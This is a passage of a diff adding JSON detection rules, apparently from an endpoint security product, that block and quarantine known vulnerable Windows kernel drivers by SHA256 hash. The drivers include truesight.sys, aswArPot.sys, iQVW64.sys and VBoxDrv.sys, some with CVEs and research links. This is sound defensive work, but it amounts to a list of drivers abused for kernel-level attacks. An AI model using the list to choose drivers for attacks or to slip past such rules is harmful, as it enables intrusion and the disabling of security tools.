+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477237Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3515a69fdcd951f4aed637a3c3356378b56e32d79b7b597d7ae9cc1c153b3b7b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "96795c8f-168d-5c6b-9ebe-59681a2b58c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808075Z",
+ "creation_date": "2026-03-23T11:45:31.808078Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808086Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "67891a95788e438cd8c1ad5cc8027092e57c081847d019ce33e0b304b9c6a5a3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "96814314-afe0-504c-b038-7dbf0a8c48e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820530Z",
+ "creation_date": "2026-03-23T11:45:30.820532Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820537Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31add0358eb679d7c10ac1622403a85891bf764154280a589e71ccd297fc7a16",
+ "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "96835009-f048-5bf0-996a-7ec39ff0c995",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157084Z",
+ "creation_date": "2026-03-23T11:45:31.157086Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157091Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eb492ba828682133959cac42660c30166e7e255d0e78bbd2a150457fc7688c3a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "969aa62d-de2e-5596-a0f8-8a9f52b95028",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478375Z",
+ "creation_date": "2026-03-23T11:45:30.478378Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478426Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d44848d3e845f8293974e8b621b72a61ec00c8d3cf95fcf41698bbbd4bdf5565",
+ "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "96b8e774-0125-5361-ade5-34375317bd0f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459624Z",
+ "creation_date": "2026-03-23T11:45:30.459627Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44a0599defea351314663582dbc61069b3a095a4ddad571bb17dd0d8b21e7ff2",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "96bd207b-2388-5da8-bb30-67722ca910c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969292Z",
+ "creation_date": "2026-03-23T11:45:29.969294Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969299Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be8dd2d39a527649e34dc77ef8bc07193a4234b38597b8f51e519dadc5479ec2",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "96cb1210-1437-5c22-a744-136a6c727149",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612832Z",
+ "creation_date": "2026-03-23T11:45:29.612834Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612840Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa",
+ "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "96d9105c-054d-5b4c-9566-77bf1d36e7a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150444Z",
+ "creation_date": "2026-03-23T11:45:31.150446Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150451Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77e42a3df51e106a8f7bc905e9b56b2d7a51fc72777a835d5c0e066be3c37279",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "96d95ca0-26c8-5ddc-9a24-5fe0a96fb5f8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477921Z",
+ "creation_date": "2026-03-23T11:45:30.477924Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477933Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c4fc8f04721363f4b570accf700f507fb0b0381a81d3a8ffb768ded65978ac50",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "96f1f46e-adfb-50a0-a6c6-96d811019e58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608189Z",
+ "creation_date": "2026-03-23T11:45:29.608191Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608196Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4127dace7354514f4698d94ba29affc9815c6d35b258883028c523fdba675218",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "96f63ecc-b58c-5684-b828-acd7bc0975ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813245Z",
+ "creation_date": "2026-03-23T11:45:31.813248Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813256Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d2749ad65ee9272ed72c9569371b056a2c16d89a63cee3c45bdb447e5e8fdbbf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "96fb724b-9673-53d6-9c08-12b8fb41595a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156808Z",
+ "creation_date": "2026-03-23T11:45:31.156810Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156816Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f011a0917120872193694c73f03788e500b6fc80faea219d876366eb80777fbd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "96fd1301-30e0-560a-ae4f-6ed92f391c68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616221Z",
+ "creation_date": "2026-03-23T11:45:29.616223Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616228Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0",
+ "comment": "Huawei vulnerable BIOS update tool (aka Phymemx64.sys) [https://www.loldrivers.io/drivers/268e87ba-ad44-4f3c-986f-26712cac68da/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "97030c91-da74-5db6-82f6-9315a1d5dacd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816039Z",
+ "creation_date": "2026-03-23T11:45:31.816042Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816050Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7942bc1c3c3699fc8ca271f42396f9f3115419fd2000bb2271e5c97baf9f0df2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9707d6ff-dc80-5fc4-9c74-80dbac1a6a28",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809701Z",
+ "creation_date": "2026-03-23T11:45:31.809705Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809713Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "689ed52d962fb6e8467ae8acb861e54b67af81a43a09332f84487b7c5a7295ff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "970dd668-8f04-5344-9ff9-d252646fe0d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477132Z",
+ "creation_date": "2026-03-23T11:45:31.477136Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477145Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c50bcdc8b656a8e4eb027cc9bdecde9839b1d264e28d396bd9444ff1fc1fa36",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "97124aee-e046-5366-b6db-4583bd8351e5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971951Z",
+ "creation_date": "2026-03-23T11:45:29.971953Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971958Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dec391d24c986f2d0af0fb680705e4d22ff6f1d8aeb2656c9e7159dd873d22fb",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9712c8aa-d212-596c-8fd9-e08ea37f5cb5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833261Z",
+ "creation_date": "2026-03-23T11:45:30.833265Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833273Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eabb8103cdc97c7cdfaf60424922d10f0c8ed93aa2445d744c7bbf818bf42abd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9718d72e-b3f6-5725-9047-ecb60d7db4ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821102Z",
+ "creation_date": "2026-03-23T11:45:31.821106Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821114Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a5e58c8d462a64fd87ba105e322ffe187ee3f579b9a4f2d3979a0591e26c7289",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9719fff2-1fb3-5a27-89d3-390ab652d22f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145053Z",
+ "creation_date": "2026-03-23T11:45:31.145055Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145061Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d81c5fd006b5426dfac0775df41310d4baa7e5658b5dd98c211bb262f162bc0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "971b627c-1aba-5d37-8b5b-971d50ea6320",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490609Z",
+ "creation_date": "2026-03-23T11:45:31.490611Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490616Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b234b96dc4c064eb7cb9a2c742b271519d61eb957c32d2fc8772238f826286eb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "9722e225-3c41-52c6-8ea3-5e7e757adea1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968809Z",
+ "creation_date": "2026-03-23T11:45:29.968811Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968817Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
